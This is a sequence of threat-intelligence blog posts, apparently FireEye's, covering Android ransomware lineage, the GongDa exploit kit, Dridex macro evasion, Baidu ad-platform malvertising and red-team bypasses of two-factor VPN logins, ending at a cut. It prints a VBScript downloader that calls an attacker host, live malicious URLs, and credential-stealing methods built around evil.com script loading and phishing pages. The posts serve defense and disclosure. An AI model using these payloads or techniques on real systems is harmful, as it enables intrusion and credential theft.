Figure 5 shows the code structure comparison between these two samples. Note that this SimpleLocker variant also has the major components ServiceStarter and MainService, both used by SlemBunk. However, the purpose of the main service here is not to monitor running apps and provide phishing UIs to steal banking credentials. Instead, SimpleLocker’s main service component scans the device for victim files and calls the file encryption class to encrypt files and demand a ransom. The major differences in the SimpleLocker code are shown in the red boxes: AesCrypt and FileEncryptor. Other common classes include:

  • Main, the launching activity of both samples.
  • SDCardServiceStarter, another receiver that monitors the status of MainService and restarts it when it dies.
  • Tor and OnionKit, third-party libraries for private communication.
  • TorSender, HttpSender and Utils, supporting classes to provide code for CnC communication and for collecting device information.

Figure 5. Code structure comparison between SimpleLocker and SlemBunk samples

Finally, we located another SimpleLocker sample (SHA256 304efc1f0b5b8c6c711c03a13d5d8b90755cec00cac1218a7a4a22b091ffb30b) from July 2014, about two months after the first SimpleLocker sample. This new sample did not use Tor for private communications, but shared four of the five major components as the SlemBunk sample (SHA256: f3341fc8d7248b3d4e58a3ee87e4e675b5f6fc37f28644a2c6ca9c4d11c92b96). Figure 6 shows the code structure comparison between these two samples.

Figure 6. Code structure comparison between SimpleLocker and SlemBunk variants

As we can see in Figure 6, the new SimpleLocker sample used a packaging mechanism similar to SlemBunk, putting HttpSender and Utils into a sub-package named “utils”. It also added two other major components that were originally only seen in SlemBunk: MessageReceiver and MyDeviceAdminReceiver. In total, this SimpleLocker variant shares four out of five major components with SlemBunk.

Figure 7 shows the major code of MessageReceiver in the previous samples to demonstrate that SimpleLocker and SlemBunk use basically the same process and logic to communicate with the CnC server. First, class MessageReceiver registers itself to handle incoming short messages, whose arrival will trigger its method onReceive. As seen from the figure, the main logics here are basically the same for SimpleLocker and SlemBunk. They first read the value of a particular key from app preferences. Note that the names for the key and shared preference are the same for these two different malware families: key is named “CHECKING_NUMBER_DONE” and preference named “AppPrefs”.  The following steps call method retrieveMessage to retrieve the short messages, and then forward the control flow to class SmsProcessor. The only difference here is that SimpleLocker adds one extra method named processControlCommand to forward control flow.

Class SmsProcessor defines the CnC commands supported by the malware families. Looking into class SmsProcessor, we identified more evidence that SimpleLocker and SlemBunk are of the same origin. First, the CnC commands supported by SimpleLocker are actually a subset of those supported by SlemBunk. In SimpleLocker, CnC commands include "intercept_sms_start", "intercept_sms_stop", "control_number" and "send_sms", all of which are also present in SlemBunk sample. What is more, in both SimpleLocker and SlemBunk there is a common prefix “#” before the actual CnC command. This kind of peculiarity is a good indicator that SimpleLocker and SlemBunk share a common origin.

Figure 7. Class MessageReceiver for SimpleLocker and SlemBunk variants

The task of class MyDeviceAdminReceiver is to request device administrator privilege, which makes these malware families harder to remove. SimpleLocker and SlemBunk are also highly similar in this respect, supporting the same set of device admin relevant functionalities.

At this point, we can see that these variants of SimpleLocker and SlemBunk share four out of five major components and share the same supporting utilities. The only difference is in the final payload, with SlemBunk phishing for banking credentials while SimpleLocker encrypts certain files and demands ransom. This leads us to believe that SimpleLocker came from the same original code base as SlemBunk.

Conclusion

Our analysis confirms that several Android malware families share a common origin, and that the first known file-encrypting ransomware for Android – SimpleLocker – is based on the same code as several banking trojans. Additional research may identify other related malware families.

Individual developers in the cybercrime underground have been proficient in writing and customizing malware. As we have shown, malware with specific and varied purposes can be built on a large base of shared code used for common functions such as gaining administrative privileges, starting and restarting services, and CnC communications. This is apparent simply from looking at known samples related to GM Bot – from SimpleLocker that is used for encryption and ransomware, to SlemBunk that is used as a banking Trojan and for credential theft, to the full-featured MazarBot backdoor.

With the leak of the GM Bot source code, the number of customized Android malware families based on this code will certainly increase. Binary code-based study, one of FireEye Labs’ major research tools, can help us better characterize and track malware families and their relationships, even without direct access to the source code. Fortunately, the similarities across these malware families make them easier to identify, ensuring that FireEye customers are well protected.

References:

[1]. Android Malware About to Get Worse: GM Bot Source Code Leaked
[2]. Android.Bankosy: All ears on voice call-based 2FA
[3]. MazarBOT: Top class Android datastealer
[4]. SLEMBUNK: AN EVOLVING ANDROID TROJAN FAMILY TARGETING USERS OF WORLDWIDE BANKING APPS
[5]. SLEMBUNK PART II: PROLONGED ATTACK CHAIN AND BETTER-ORGANIZED CAMPAIGN
[6]. ESET Analyzes Simplocker – First Android File-Encrypting, TOR-enabled Ransomware


GongDa vs. Korean News

$
0
0

On Jan. 27, we observed visitors to a Korean news site being redirected to the GongDa Exploit Kit (EK), potentially exposing them to malware infection. We will be referring to this site as KNS.

GongDa is an exploit kit that can compromise vulnerable endpoints by use of exploits, allowing harmful malware to be installed on the system. While GongDa is an older exploit kit that continues to use Java exploits, it has also been found delivering both Flash and VBScript exploits as well. Despite its shortcomings when compared to newer EK’s such as Angler or Neutrino, GongDa proves that old tricks (or vulnerabilities) can still work effectively.

ATTACK CHAIN

The attack chain is no different than previous GongDa attacks we’ve seen in the past. A compromised page on the site loads a .js file that redirects to the EK’s landing page.

Figure 1: GongDa EK attack chain

Where the initial page is at the first highlighted request shown in Figure 1. The second request is the .js file jquery-1.3.2.min.js. It has script code injected at the bottom that loads an iframe to sekielec[.]co[.]kr/m/et/ad.html, the EK’s landing page as shown in Figure 2.

Figure 2: Injected script in the .js leading to GongDa

We observed a number of KNS owned pages loading the malicious .js redirecting to the GongDa landing page “/ad.html”.

From here, “ad.html” loaded:

sekielec.co.kr/m/et/swfobject.js
sekielec.co.kr/m/et/PnNxKk.html

sekielec.co.kr/m/et/jquery.js

EXPLOITS

GongDa has been observed serving the following CVE exploits in recent attacks:

2011-3544, 2011-2140, 2012-0507, 2012-1723, 2012-1889,
2012-4681, 2012-5076, 2013-0422, 2013-0634 and 2014-6332.

In this particular attack, the landing page probes the target machine and selects an exploit page to deliver to the victim. The exploit page observed in this attack was sekielec.co.kr/m/et/PnNxKk.html. It attempts to trigger CVE-2014-6332, “Windows OLE Automation Array Remote Code Execution Vulnerability”. This is a vulnerability that was patched by Microsoft Security Bulletin MS14-064 in November of 2014. It is a commonly used and dangerous vulnerability that can give an attacker arbitrary command execution on a target system.

The exploit page begins by reversing a string of script code used to start the exploitation process.

Figure 3 shows the before:

Figure 3: Reversed initiation code

And Figure 4 shows the after:

Figure 4: Initiation code

A call to the Create() function leads to a function call to the trigger function Over(), which is shown in Figure 5.


Figure 5: Trigger function Over()

The Over() function is responsible for setting up conditions and corrupting an OLE Automation array object, thus triggering the vulnerability.

Once the vulnerability is triggered, the attacker code can execute commands on the system.

Three variables are assigned, as shown in Figure 6.


Figure 6: Command variables

The first variable (nburl) is a URL to the attacker malware. The second variable (nbExE) is a randomly generated name for the malware that is placed on the system. The third variable (nbnurl) is simply the first variable enclosed in quotes.

nburl: http://smsforu.co.kr/RAD/stat/at.exe

Finally, the attacker code uses these variables and executes the following commands, as shown in Figure 7.

Figure 7: Command beginning

The nbnurl and the nbExE variable are used in the execution of the commands shown in Figure 8.

Figure 8: Command ending

The malicious file is placed in the “%SystemRoot%system” directory using the nbExE variable described above as a filename.

PAYLOADS

During this GongDa attack we saw the payloads being served from a domain within Korea:

smsforu[.]co[.]kr

With the following filename:

/rad/stat/at.exe

In recent GongDa attacks, we’ve observed payloads such as backdoors, RATs, Trojans, and downloaders.

Some of the MD5’s observed include the following:

  • aac178f775588ca1d42c00d4d95604bd
  • 3d58f4b2008f6d87cab9166c09e513b5
  • a18d1bce5618b23f592dae9133c25229
  • 40be7c9424c6c6de0d560d358a020a5c
  • 808e27fd120ade3ecfb2b21aeda8bc58
  • ed751ce651d685100e00ed133e4e5018
ADDITIONAL INFO

Attacks involving the GongDa Exploit Kit are not new and are fairly common in the APAC region. While it’s not the most cutting edge EK in the wild, it is still effective because many systems in the region seem to remain unpatched and defenseless against antiquated vulnerabilities such as those used by GongDa.

Additionally, GongDa consistently leverages infrastructure hosted on one of China’s largest ISP’s, China Telecom, operators of AS4134. China Telecom hosts the domain 51yes[.]com, a web traffic statistics service.

One of GongDa’s telltale behaviors is the use of stat counters, presumably for tracking the EK’s traffic and infection statistics. In this case they most always come from countX[.]51yes[.]com, based out of China. Figure 9 shows the GET requests for these stat counters.


Figure 9: Stat counter request

FireEye’s Dynamic Threat Intelligence shows that count7[.]51yes[.].com has been used in multiple GongDa EK attacks in January 2016 alone.

Referering GongDa URL

bose.co.kr/shop/img/click/ad1.html

bose.co.kr/shop/img/click/as1.html

bose.co.kr/shop/img/naver/ad.html

edresearch.co.kr/PEG/click/ad.html

edresearch.co.kr/PEG/click1/ad.html

nstory.com/tmp/click/ad1.html

nstory.com/vars/ad/ad1.html

nstory.com/vars/cache/click/ad1.html

odbike.co.kr/w3c/cdn/ad1.html

odbike.co.kr/shop/skin/click/ad1.html

odbike.co.kr/shop/temp/click/ad1.html

odbike.co.kr/w3c/cdn/ad1.html

poption.kr/gnu/cdn1/ad.html

poption.kr/gnu/click/ad.html

poption.kr/gnu/extend/ad/ad.html

poption.kr/w3c/click/ad.html

sekielec.co.kr/m/et/ad.html

smsmaster.co.kr/docs/click1/ad.html

smsmaster.co.kr/docs/click3/ad.html

www.poption.kr/gnu/js/click/ad.html

Checking other countX[.]51yes[.]com hits with GongDa referrer’s, we saw hundreds of domains affected by the GongDa EK activity.

It is believed that the GongDa Exploit Kit has Chinese origins. The hypothesis is derived from capabilities, usage, and the infrastructure used to target various APAC region entities.

Interestingly, the registrant for the sekielec.co[.]kr GongDa landing page domain, “rhhan AT sekihe.co[.]kr”, also registered a number of other domains that have been observed as being GongDa landing pages as well.

CONCLUSION

With a name reminiscent of a creature straight out of Monster Island, GongDa may not be the new kid on the block; however, as demonstrated, it is still active and capable of wreaking havoc. Network defenders in the APAC region should be aware of this EK and take steps to ensure this “monster” never enters their network.

ACKNOWLEDGEMENTS

The authors and FireEye Labs would like to thank Dan Perez for his contribution to this blog.

Stop Scanning My Macro

$
0
0

FireEye Labs detected an interesting evasion strategy in two recent, large Dridex campaigns. These campaigns changed the attachment file-type and location of malicious logic in an attempt to avoid scanners.

Overview

Both campaigns used an invoice theme and came from a wide variety of sending addresses, with messages being sent to more than 40 countries across all industries, as seen in Figure 1 and Figure 2. The following subject lines were used:

Invoice <xxxx> from Tip Top Delivery
Urgent: IMAGINiT invoice <xxxx> is Past due

Figure 1. Affected Countries

Figure 2. Affected Industries

What made these two campaigns interesting was the major shift in the downloader techniques used to evade signature-based detection. The following are some of the key techniques that were used:

  1. Disguising WordprocessingML as RTF file to evade type specific signatures.
  2. Keeping the main malicious macro clean to avoid macro-based detection. The malicious VBA code was instead stored in TextBox objects located within the Forms, as seen in Figure 4.
  3. Dropping a VBE based downloader that could not be seen without execution of the malicious RTF file. This downloader would then download and execute the malicious payload.
1.    Masquerading WordprocessingML as RTF file

While Dridex has traditionally been delivered using Excel, Word, or JavaScript files, these two large campaigns involved WordprocessingML (an XML format that is supported by Microsoft Word to describe a Word document) masquerading as RTF files. This seems to be a trend, as we saw a similar technique in previous campaigns where a DOCM file was disguised as RTF. Figure 3 shows a screenshot of the Tip Top campaign, set as high priority.

Figure 3. Designed Campaign

2.    Keeping the main macro clean

In the extracted macro, it is interesting to note that there is almost no malicious content that could trigger static detection. In fact, a majority of the key ingredients are stored in text boxes within created forms, shown in Figure 4.

Using this, it defeats signature-based scanning, which tries to detect known malicious macro based on past knowledge. At the time of discovery, most of the samples that were observed were detected by only one out of 56 vendors on VirusTotal, which indicates that modifications made to these malicious documents was likely an effort to avoid detection.

Figure 4. Secret Macro

3.    VBE Downloader

Once the malicious macro is launched, the Word document drops a malicious VB Encoded script in a temporary folder, as shown in Figure 5.

Figure 5. Location of the VBE

Based on our analysis, the VBE simply downloads Dridex from the malware server and installs it on infected machines, as shown in Figure 6.

Figure 6. Decoded VBE

Signatures

The authors left Cyrillic strings in the XML, which could possibly be used as an IOC to hunt for similar documents.

  • <wx:uiName wx:val="Основной шрифт абзаца"/> (translates to "The main text of the paragraph")
  • <wx:uiName wx:val="Обычная таблица"/> (translates to "table Normal")
  • <wx:uiName wx:val="Нет списка"/> (translates to "No List")
  • <o:LastAuthor>павуваыва</o:LastAuthor>
Conclusion

Cybercriminals continue to innovate, this time demonstrating a creative way of making threats harder to detect using static signatures. To remain secure, it is important to stay vigilant and proactive in three key areas: user awareness, policy and technology.

Indicators of Compromise

1.     IMAGINiT campaign

MD5
8840c20ac74281c0580e8637caf1edea
800f90f29d13716eb1f7059fb84089ed
7e74d5a3a20038fe0a66445eb76fa066
7a4b7762f8db2438b4ad3d991864431d
74f9da1ce1ff900113ae7cb28b3eb56f
6ccc678c3ec284fad015ed0eaa875733
3ea5c225132f0d7423417b3c7ce98c7d
33b2a2d98aca34b66de9a11b7ec2d951

Network Indicator
GET /michigan/map.php HTTP/1.1
house.nochildforgotten.org
IGINV51905.rtf

2.     Tip Top Delivery campaign

MD5
858451ad73050bda48e5470abd2643ac
aff54d68cbf6ac8611fe89cd9f0dc2de
876d081e8b474a3c1ac57cf435e330cb
d8eebe2a08fff86abd06ec94e8bdd165
8c07b9337deda3c589d50e4ff3aadcd6
73c7bf49caa0d1bd37053b99a986ebe8
770fede93cc4220a371569daed2a4bc1
5b7813105cf9ebccb46cf7e63a5a836d
8f787ddedbaa8af3f6a73d0c6cd4e33e

Network Indicator
GET /michigan/map.php HTTP/1.1
parts.woodwardcounselinginc.com
Invoice_GIINV02514_from_tip_top_delivery.rtf

Wiping Out a Malicious Campaign Abusing Chinese Ad Platform

$
0
0

At FireEye Labs, we have discovered another well-crafted malvertising campaign that uses the ad API of one of the world’s largest search engines: China-based Baidu. The attacker employs a simple HTML redirector instead of shellcode or an exploit in an apparently benign-looking website. This leads to a redirection loop fetching malicious content from compromised ad slots, which starts dropping malwares in a chain on the infected machine. This malvertising campaign involving Baidu’s API has been designed in a way so that its actual source is hard to trace back.

The campaign was first seen in the middle of October 2015, and instances of the threat were still active as of February. Baidu took several steps to address the issue following FireEye’s responsible disclosure, but at the time, Internet surfers who navigated to an infected page for this campaign – such as hxxp://www.duds[.]win – would be redirected to the following URL:

hxxp://www.ymnemh[.]info/index.htm

There are two parts of the obtained response.

Setting up a redirection loop:

In first part of response, the code creates a number of tracking cookies using JavaScript, which keeps track of the current time and number of visits to the page. Said script is given in Code Listing 1 for reference:

<script>
function getCookieVal(offset) {
    var endstr = document.cookie.indexOf(";", offset);
    if (endstr == -1)
        endstr = document.cookie.length;
    return unescape(document.cookie.substring(offset, endstr));
}
function GetCookie(name) {
    var arg = name + "=";
    var alen = arg.length;
    var clen = document.cookie.length;
    var i = 0;
    while (i < clen) {
        var j = i + alen;
        if (document.cookie.substring(i, j) == arg)
            return getCookieVal(j);
        i = document.cookie.indexOf(" ", i) + 1;
        if (i == 0)
            break;
    }
    return null;
}
function SetCookie(name, value) {
    var argv = SetCookie.arguments;
    var argc = SetCookie.arguments.length;
    var expires = (2 < argc) ? argv[2] : null;
    var path = (3 < argc) ? argv[3] : null;
    var domain = (4 < argc) ? argv[4] : null;
    var secure = (5 < argc) ? argv[5] : false;
    document.cookie = name + "=" + escape(value) +

        ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
        ((path == null) ? "" : ("; path=" + path)) +
        ((domain == null) ? "" : ("; domain=" + domain)) +
        ((secure == true) ? "; secure" : "");
}
function DisplayInfo() {
    var expdate = new Date();
    var visit;
    // Set expiration date to a year from now.
    expdate.setTime(expdate.getTime() + (24 * 60 * 60 * 1000 * 365));
    if (!(visit = GetCookie("visit")))
        visit = 0;
    visit++;
    SetCookie("visit", visit, expdate, "/", null, false);
    var url = "";
    if (visit == 2) url = "hxxp://www.ymnemh[.]info/index2.htm";
    if (visit == 3) url = "hxxp://www.txiu[.]cc/index3.htm";
    if (visit >= 4) { url = "hxxp://www.ymnemh[.]info/index.htm";
                     ResetCounts(); }
    if(url != "") window.location = url;
}
function ResetCounts() {
    var expdate = new Date();
    expdate.setTime(expdate.getTime() + (24 * 60 * 60 * 1000 * 365));
    visit = 0;
    SetCookie("visit", visit, expdate, "/", null, false);

}
DisplayInfo();
</script>

The highlighted part of Code Listing 1 is of main interest here. Every time the user lands on this web page, the browser is redirected to a certain set of infected pages for the same attack family until the user loops back to the same page – and it continues forever.

Deploying the attack iframe:

In the second part of the response, the first attack iframe is deployed, as seen in Figure 1:

Figure 1. The first attack iframe (Remember the highlighted part)

When the GET request for this iframe is generated, it feeds a compromised ad slot id to the standard ad API of Baidu using the API standard script o.js, as seen in Figure 2.

Figure 2. The second attack iframe is being fetched from a compromised ad slot

The script hxxp://cbjs.baidu[.]com/js/o.js generates the following request (Figure 3). The response is the second attack iframe (Figure 4):

Figure 3. Notice the compromised ad slot 1xxxx78 that is being utilized to fetch second iframe

Figure 4. The second attack iframe has been fetched from compromised ad slot 1xxxx78

The second attack iframe hxxp://p.jiayuepc[.]com/c.html?u=c6 has now been fetched in the above response from the compromised ad slot 1xxxx78. This is the URL that gets the actual attack from the last compromised ad slot in this attack, i.e. 1xxxx80, to fetch the actual attack script. The response to this URL can be seen in Figure 5.

Figure 5. The second attack iframe hxxp://p.jiayuepc[.]com/c.html?u=c6 has requested attack body from the compromised ad slot 1xxxx80

Here comes the malicious code:

Figure 6 shows the final request made to the ad server by the ad API script o.js using the compromised ad slot id.

Figure 6. Second attack iframe generates Baidu's ad API request fetching malicious VBScript from compromised ad slot

Notice the underlined part of this automatically generated URL by o.js in Figure 6. ltu, ltr and lcr variables are assigned first attack iframe URL string, whereas liu is given the second attack iframe URL string. These will be utilized in dynamically altering the contents of the actual attack response – in this case, the name of the executable being dropped.

The server responds with the encrypted attack masked inside the API’s response body. What is actually hiding inside is a VBScript that is dropped in C:\Windows\Temp with the name logo.vbs. It downloads and launches a malicious executable from a dedicated file server. The contents of this script are interesting, as shown highlighted in Code Listing 2.

Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET","hxxp://co.lxxxxx98[.]com/logo.bmp?1450263107531",0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\Windows\Temp\logo_c6-66pb_pic10.exe",2

Code Listing 2

Here, c6-66pb_pic10 is the name of the dropped executable that is derived from the iframe URLs that eventually lead to the attack slot, so this dynamically generated name is different for different redirection pathways, as shown in Figure 7.

Figure 7. Attack has been dynamically altered based on first and second iframe information which was sent to slot 1xxxx80

A pseudorandom numeric token (in this case 1450263107531, as highlighted in Code Listing 2) is sent to the attack hosting server co.lxxxxx98[.]com along with the logo.bmp request (as highlighted in code line #2 in Code Listing 2). The response is a polymorphic Trojan downloader executable that always has the same name, i.e. logo.bmp.

In this case, the executable is from a Trojan downloader family recognized by Microsoft as Win32/Jongiti. As per the Microsoft.com website:

“This threat downloads and installs other programs onto your PC without your consent, including other malware.”

The infection continues:

The attack doesn’t stop there. Another GET request to the same server hosting logo.bmp is generated, requesting a file named c.ini, as seen in Figure 8.

Figure 8. c.ini requested from the same server lxxxxx98[.]com that served the first binary as logo.bmp

A list is returned in the response containing potentially unwanted programs (PUPs) and Trojan downloaders available for direct download, as shown in Figure 9.

Figure 9. c.ini lists downloadable executables returned in response to hxxp://pz.lxxxxx98[.]com/c.ini?1450263172

The list from c.ini is then fed to logo_c6-66pb_pic10.exe as an argument, and one by one unwanted content – mostly PUPs, keyloggers and pornographic content droppers – are launched on the victim machine. Figure 10 shows this process.

Figure 10. logo_c6-66pb_pic10.exe downloads rag1446260.exe, which can download further unwanted content

On systems running Windows, the latest versions of Internet Explorer (IE) will prompt against this malvertisement since, as of IE11, Microsoft stopped supporting execution of VBScript on the client side. Users who are currently running versions of IE that are older than 11.0 can stay safe from these types of attacks by simply upgrading their browsers to IE11 or later.

FireEye representatives contacted Baidu officials to responsibly disclose the issue. Baidu fully cooperated by taking immediate action against the attacking party and removing all malicious content. They also made immediate changes to their ad platform regulations so that certain dynamic behaviors such as loading VBScript or downloading executables from suspicious domains are no longer allowed.

A shift to backup ad slots:

Though crippled due to its main ad slot content being removed, this malvertising campaign shifted to its backup ad slots. FireEye immediately communicated the details to Baidu and the issue was quickly addressed. At the time of posting, the campaign is no longer active. During the two-week wait period before FireEye made this post public, Baidu has been doing a massive search and clean operation on their ad slots. As per Baidu officials:

  • From March 14 to March 18, evidence gathering from the attacker account was finalized and all their malicious content was cleaned.
  • It is now mandatory for all existing and new accounts to bind and verify a cellphone number and domain name registration record (both have real-name enforcement in China) for verification. Account identities related to malicious content can be provided to the law enforcement agencies.
  • Baidu has enhanced its detection mechanism to capture malicious content hosted on its ad platform. All existing uploaded content is also to be fully scanned.

From March 21 to March 31, Baidu is in the process of shutting down the upload channel of user defined scripts and Flash to their ad platform. This means that similar malvertising campaigns can no longer host content on Baidu’s ad slots in the future.

99 Problems but Two-Factor Ain’t One

$
0
0

Two-factor authentication is a best practice for securing remote access, but it is also a Holy Grail for a motivated red team. Hiding under the guise of a legitimate user authenticated through multiple credentials is one of the best ways to remain undetected in an environment. Many companies regard their two-factor solutions as infallible and do not take precautions to protect against attackers’ attempts to bypass or backdoor them.

The techniques covered in this blog range from simple to advanced methods of handling two-factor authentication from the perspective of a red team, and provide insight into potential visibility gaps for security teams to address. I’ll discuss techniques for bypassing two-factor authentication remotely without access to the internal environment, and how to gain access to a two-factor authenticated remote access device with information stolen from the internal environment.

1) K.I.S.S - Keep It Simple, Stupid

Compromising a remote access solution is a red team’s foremost goal because it offers easy access and a low risk of being caught. Red teams using legitimate remote access solutions can conduct their command, control, exploitation, and exfiltration activities under the guise of properly authenticated sessions. In addition, the red team’s system is not subject to the same security restrictions or controls as other corporate systems. This means that the team does not have to deal with antivirus, application whitelisting, and other intrusion detection software interfering with their activities. Two-factor authentication obviously raises the difficulty to compromise these remote access solutions, and challenges red teams to subvert the two-factor protections in place.

In difficult situations like these, it’s best to adopt an Occam’s razor approach and use the most straightforward method to acquire the credentials we need: ask the victim to enter them for us. The perfect trap happens to be the simplest to set.

In Figure 1, we have two different VPN login pages. One is a corporation’s legitimate site, the other is a fake operated by a crafty red team. Can you spot the difference?

Figure 1: VPN authentication page comparison

No? Neither can your users. Using tools such as the Social-Engineer Toolkit (SET), anyone can effectively replicate an external page by changing the HTML’s local resource locations (“/home/image/logo.png”) to external references (“mycompany.com/home/image/logo.png”). With a compelling phishing scenario, you can guide the victim to your visual clone VPN authentication page and get all the information you need to make your own connection: username, password, and even the token code!

If the red team can move quickly enough, they can take credentials submitted to the fake VPN page and use them to authenticate to the actual VPN. As shown in Figure 2, this can be accomplished by redirecting the login submission to a PHP script that will write the username, password and other metadata (IP address, HTTP User-Agent, time of submission) to a log file that the red team can monitor and wait for a user to provide their two-factor credentials.

Figure 2: Credential theft PHP POST script

Once the red team authenticates to the VPN, they can attempt to escalate privileges and access sensitive data before the security team can detect and respond to the phish. Internal network reconnaissance through scanning, identifying applications and systems that the victim user can access, and even LLMNR/NBT-NS spoofing offer potential avenues to turn a VPN session into full compromise of the environment.

The Mandiant Red Team leverages SpiderLabs’ Responder as our LLMNR/NBT-NS spoofing tool of choice. Responder is a powerful Python utility that sends fake responses to LLMNR/NBT-NS requests to fool systems and services into providing password hashes and, in some cases, plaintext credentials. Running Responder on a VPN subnet for even a few minutes (as exemplified in Figure 3) can provide numerous domain accounts and password hashes. Common passwords and passwords with low complexity requirements can have their hashes cracked in seconds, giving the red team the plaintext credentials they need to continue their lateral movement and privilege escalation.


Figure 3: Responder example

How to prevent this attack
  1. Ensure that your VPN solution enforces a single authenticated session per user. There is limited justification for allowing multiple, concurrent sessions (with different source IP addresses) for a single user account.
  2. Conduct regular auditing of VPN authentication logs to identify anomalous login activity, such as flagging login events originating from TOR exit nodes.
  3. When responding to phishing incidents, take the potential loss of credentials seriously. If there is reason to suspect credentials were lost, make sure to reset all affected credentials and review access logs for evidence of malicious activity.

2) XSS in Sheep’s Clothing

VPN login pages are valuable targets because their image evokes a sense of familiarity and security with the users. If you authenticate to the VPN every day using a web page such as the one shown in Figure 1, odds are that you’re not inspecting your traffic or the website code to verify your credentials are going where you think they are. The scary truth is that real-world attackers have already started capitalizing on this implicit trust and have been discovered leveraging JavaScript-based credential harvesters on corporate VPN login pages.

Let’s discuss how this attack works. First, the red team exploits a vulnerability to write code to the authentication page (or a page that gets loaded by the authentication page), such as the vulnerability discussed in CVE-2014-3393. The red team then adds code to the authentication page to execute malicious JavaScript from a system they control and waits for unsuspecting users to load the page and authenticate. An example of such code is shown in Figure 4.

Figure 4: Malicious code snippet

The victim user does not notice anything different. This tiny bit of code loads file “stealcreds.js” from “https://www.evil.com” and executes its code into your legitimate user’s web session (i.e. the JavaScript code runs in the context of the user’s browser). By using an external resource, we minimize code introduction on the front page and allow ourselves the ability to dynamically update our payload each time a user’s browser requests the resource. Figure 5 shows a snippet of code we use to compromise user credentials.

Figure 5: Code snippet for stealing VPN creds

Using an internal frame insertion and a POST-back setup to “https://www.evil.com/pwnd.php”, the red team rigs the normal VPN login page to POST user credentials every time they are entered in a session where the “stealcreds.js” resource is loaded. By attacking the VPN solution itself, the red team can disguise themselves as legitimate users remotely connecting to the environment through the authorized remote access solution.

How to prevent this attack

Monitor access to your two-factor solutions and conduct regular examinations of any code served to users to ensure that no tampering has occurred. Two ways to accomplish this are to use a file integrity monitoring solution to monitor files served by networking devices and by conducting periodic scans or assessments of public infrastructure to identify changes.

3) 1.5-Factor Authentication

Another popular VPN configuration is a “host check” process as a requirement to connect to the corporate VPN. Typically, this process verifies the host’s domain and some basic configuration stats, such as whether or not antivirus signatures have been updated. Some companies view this “host check” process as a pseudo-second factor (hence the 1.5 factor title). The unfortunate issue with host inspections is that they rely on the host being trustworthy.\

We performed a red team assessment on a client that used a VPN device that required only a single-factor password authentication in addition to the “host check” process. Every piece of information examined by the “host check” process was provided in a web request and minimally obfuscated with Base64 encoding – fair game to anyone using a proxy. An example of the kind of data expected, complete with registry paths checked and the “correct answers,” is shown in Figure 6.

Figure 6: "host checker” policy from VPN authentication server

Not only does the “host check” process rely on trustworthy answers from potentially untrustworthy sources, it even provides what it’s inspecting within the request! At a minimum, a red team can attempt to modify the features examined during the check. Even worse, the response to the “host check” was a simple POST containing whether each inspected element was “correct” or not – another easy target for red teams using web proxies such as Fiddler or Burp.

We used a combination of Fiddler and Python to modify POST requests to generate a valid policy inspection report and fool the “host check” into approving us, as shown in Figure 7.

Figure 7: Python-generated policy report

Another common form of 1.5-factor authentication is leveraging usernames and passwords in combination with a computer certificate. Some companies choose to authenticate both the user and their device before allowing remote access. While this is a good approach, requiring single-factor credential authentication in combination with a locally installed certificate is not. It is trivial for an attacker to gain access to an end user system, export the locally installed computer certificate, and install the certificate on their own virtual system.

How to prevent this attack

Do not use single factor or 1.5-factor authentication for any remote access. Only strong multi-factor authentication (something you know, something physical you have, or something you are) should be implemented. If you want to leverage computer certificate in conjunction with credential-based authentication, make sure you use multi-factor credential-based authentication in conjunction with a client-side certificate.

4) Email is the Enemy

Digital tokens often require a synchronization code that is unique to each user’s token in order to function properly. The synchronization code and algorithm is what ensures the token that is displayed to the user matches the token the authentication server expects. Many companies use a simple IT-friendly process of sending users a notice via email when their request for VPN access is approved. These emails often contain the “seed” key and instructions for installation. Unfortunately for the security team, users often read this email and forget to delete it, leaving the literal keys in the users inbox, ripe for an attacker to steal.

One of the steps in the Mandiant Red Team methodology is to search email inboxes (including.PST and .OST files on disk), for these types of sensitive and useful files. In most cases, we use a simple PowerShell script to search the user’s mailbox and related files for evidence of RSA soft-token .sdtid files.

The .sdtid file is essentially a password-protected certificate of authenticity you can use to set up a digital (“soft”) token on your local host. With the combination of both the .sdtid file and password (often located in the same email sent by your IT Help Desk, stored in a local text file, or stored in a local password manager), the red team can replicate a user’s soft-token and use a simple keylogger to identify the user’s PIN. After that, the red team gains two-factor authenticated access to the network at any time, day or night, masquerading as a legitimate user.

How to prevent this attack

Innocuous things such as a soft certificate in an email can help an attacker gain access to a company. “Soft” tokens are often easier targets for compromise than physical devices, so keep that in mind when you decide what and how you are securing with two-factor. Train your users to securely delete sensitive information once they’re done with it. Train your IT staff to not include passwords in the same emails as the .sdtid file or not to include the .sdtid in an email. For instance, require your users to authenticate to a website to download the .sdtid file.

5) Leaving the Vault Key under the Doormat

“Password vault” is a phrase that will inspire groans from even the most hardened red team veterans. A properly configured password vault is a powerful tool to restrict and monitor the usage of credentials in an environment. It reduces exposure of passwords to traditional tools such as Mimikatz and Windows Credentials Editor (WCE). After all, dumping passwords becomes a tired game when all administrative credentials change every time they are checked in and out of the vault.

Add a multi-factor-enabled RADIUS authentication server with physical tokens in front of that password vault and you’ve created a real challenge for a red team. In order for a red team to get a temporarily valid password, they now need to reproduce a user password, PIN and physical token code – all at once! Even with local access via a backdoor and a keylogger, the red team likely still won’t be able to enter that token code in time before the RADIUS server shuts down access because the token has already been used.

However, rather than give up at bypassing the highest level of password security that can be realistically implemented, a red team can return to the fundamental rule of security: your security chain is only as strong as its weakest link, and that weakest link is almost always the people involved in the processes. This is where we start to explore the unsecured Windows file share.

Unsecured Windows file shares have served our Red Team well over the years. We almost always get at least some of the data necessary for privilege escalation and sensitive data theft by combing through unsecured file shares. Unfortunately for security teams, Windows makes it incredibly easy to share files and folders in a domain and for a user or red team to discover those shares and scrape through them for valuable information. PowerView’s “Invoke-ShareFinder” PowerShell script is a great utility that offers a fair amount of scalability in the hunt for shares of interest. This tool can help you discover valuable information, including interesting shares such as one we recently found named “Security”. As expected, this share was readable to any user with valid domain credentials.

In some cases, you may find yourself looking at a document such as the one shown in Figure 8.

Figure 8: Sample Excel spreadsheet

Passwords discovered in these types of documents give red team’s direct access to the authentication server, which means they can control how the authentication process works. With the password to the account used to administer the two-factor authentication solution, the red team can grant themselves – at least temporarily – access to any existing account’s password vault. As the next section shows, with this level of access comes new techniques to further entrench the red team’s control of critical infrastructure in an environment to maintain access and evade detection.

How to prevent this attack

